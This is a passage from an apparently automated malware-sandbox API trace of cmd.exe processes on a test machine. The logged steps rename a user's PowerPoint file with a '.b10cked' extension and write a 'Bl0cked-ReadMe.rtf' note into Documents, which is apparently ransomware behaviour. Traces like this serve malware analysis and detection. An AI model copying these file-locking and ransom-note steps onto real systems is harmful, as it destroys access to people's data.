lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.992] setlocale (category=0, locale=".OCP") returned="English_United States.437" 
[0231.993] GetConsoleTitleW (in: lpConsoleTitle=0x2f08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.032] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.032] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.032] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.032] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.033] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.033] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.033] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.033] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.033] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.033] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.033] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.036] GetConsoleTitleW (in: lpConsoleTitle=0x20f6f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.098] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.098] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.098] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.098] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.098] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.098] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.098] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.098] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.098] 
_wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.098] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.098] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.098] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.098] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.098] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.098] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.098] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.098] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.098] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.099] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.099] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.099] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.099] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.099] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.099] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.099] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.099] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.101] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f4b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f4ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f4ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) 
returned 1 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp 
(_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.103] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.103] _wcsicmp (_String1="1UB93Z~1.PPT", _String2=".") returned 3 [0232.103] _wcsicmp (_String1="1UB93Z~1.PPT", _String2="..") returned 3 [0232.103] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z~1.ppt")) returned 0x20 [0232.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.103] SetErrorMode (uMode=0x0) returned 0x0 [0232.103] SetErrorMode (uMode=0x1) returned 0x0 [0232.103] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x20ee24 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", lpFilePart=0x20ee24*="1UB93Z~1.PPT") returned 0x26 [0232.103] SetErrorMode (uMode=0x0) returned 0x1 [0232.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0232.104] _wcsicmp (_String1="1UB93Z~1.PPT", 
_String2=".") returned 3 [0232.104] _wcsicmp (_String1="1UB93Z~1.PPT", _String2="..") returned 3 [0232.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z~1.ppt")) returned 0x20 [0232.104] SetErrorMode (uMode=0x0) returned 0x0 [0232.104] SetErrorMode (uMode=0x1) returned 0x0 [0232.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", nBufferLength=0x104, lpBuffer=0x20f2b8, lpFilePart=0x20f050 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", lpFilePart=0x20f050*="1UB93Z~1.PPT") returned 0x26 [0232.104] SetErrorMode (uMode=0x0) returned 0x1 [0232.104] SetErrorMode (uMode=0x0) returned 0x0 [0232.104] SetErrorMode (uMode=0x1) returned 0x0 [0232.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x20f4c0, lpFilePart=0x20f050 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", lpFilePart=0x20f050*="1uB93z-ou.pptx.b10cked") returned 0x30 [0232.104] SetErrorMode (uMode=0x0) returned 0x1 [0232.104] SetLastError (dwErrCode=0x0) [0232.105] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx.b10cked")) returned 0xffffffff [0232.105] GetLastError () returned 0x2 [0232.105] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x20e9cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e9cc) returned 0x2f0ef8 [0232.105] FindNextFileW (in: hFindFile=0x2f0ef8, lpFindFileData=0x20e9cc | out: lpFindFileData=0x20e9cc) returned 0 [0232.115] GetLastError () returned 0x12 [0232.115] FindClose (in: hFindFile=0x2f0ef8 | out: hFindFile=0x2f0ef8) returned 1 [0232.116] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x301ae0, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301ae0) returned 0x2f0ef8 [0232.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x20ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", lpFilePart=0x0) returned 0x30 [0232.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx", nBufferLength=0x104, lpBuffer=0x20ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx", lpFilePart=0x0) returned 0x28 [0232.116] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx")) returned 0x20 [0232.116] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx.b10cked"), dwFlags=0x3) returned 1 [0232.117] FindClose (in: hFindFile=0x2f0ef8 | out: hFindFile=0x2f0ef8) returned 1 [0232.117] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ec18 | out: _Buffer=" 1") returned 9 [0232.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.118] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20eba4 | out: lpMode=0x20eba4) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ebd8 | out: lpConsoleScreenBufferInfo=0x20ebd8) returned 1 [0232.148] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.148] 
FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ec18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.148] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20ebfc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ebfc*=0x1a) returned 1 [0232.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.151] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.192] exit (_Code=0) Process: id = "616" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], 
"NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34435 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34436 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34437 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34438 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34439 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34440 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34441 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34442 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34443 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34444 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34759 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34760 start_va = 0x20000 end_va = 0x2ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34761 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34762 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 34763 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 34764 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34765 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34766 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34767 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34768 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34769 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id 
= 34770 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34771 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34772 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34773 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 34774 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34775 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34776 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34777 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34778 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34779 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34780 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 34781 start_va = 0x530000 
end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 34782 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 856 os_tid = 0x9a8 [0232.426] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef8e4 | out: lpSystemTimeAsFileTime=0x1ef8e4*(dwLowDateTime=0xbe176d20, dwHighDateTime=0x1d440a9)) [0232.426] GetCurrentProcessId () returned 0x748 [0232.426] GetCurrentThreadId () returned 0x9a8 [0232.426] GetTickCount () returned 0x3ff06 [0232.426] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef8dc | out: lpPerformanceCount=0x1ef8dc*=28921537198) returned 1 [0232.427] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.427] __set_app_type (_Type=0x1) [0232.427] __p__fmode () returned 0x76b331f4 [0232.427] __p__commode () returned 0x76b331fc [0232.427] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.427] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.427] GetCurrentThreadId () returned 0x9a8 [0232.428] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a8) returned 0x38 [0232.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.428] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.428] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.428] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef874 | out: phkResult=0x1ef874*=0x0) returned 0x2 [0232.428] VirtualQuery (in: lpAddress=0x1ef8ab, 
lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.428] GetConsoleOutputCP () returned 0x1b5 [0232.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.429] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.429] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.429] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.429] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.430] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.430] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) 
returned 1 [0232.430] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.430] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.430] GetEnvironmentStringsW () returned 0x260168* [0232.430] FreeEnvironmentStringsW (penv=0x260168) returned 1 [0232.430] GetEnvironmentStringsW () returned 0x260168* [0232.431] FreeEnvironmentStringsW (penv=0x260168) returned 1 [0232.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee7e4 | out: phkResult=0x1ee7e4*=0x40) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x90, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x0, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: 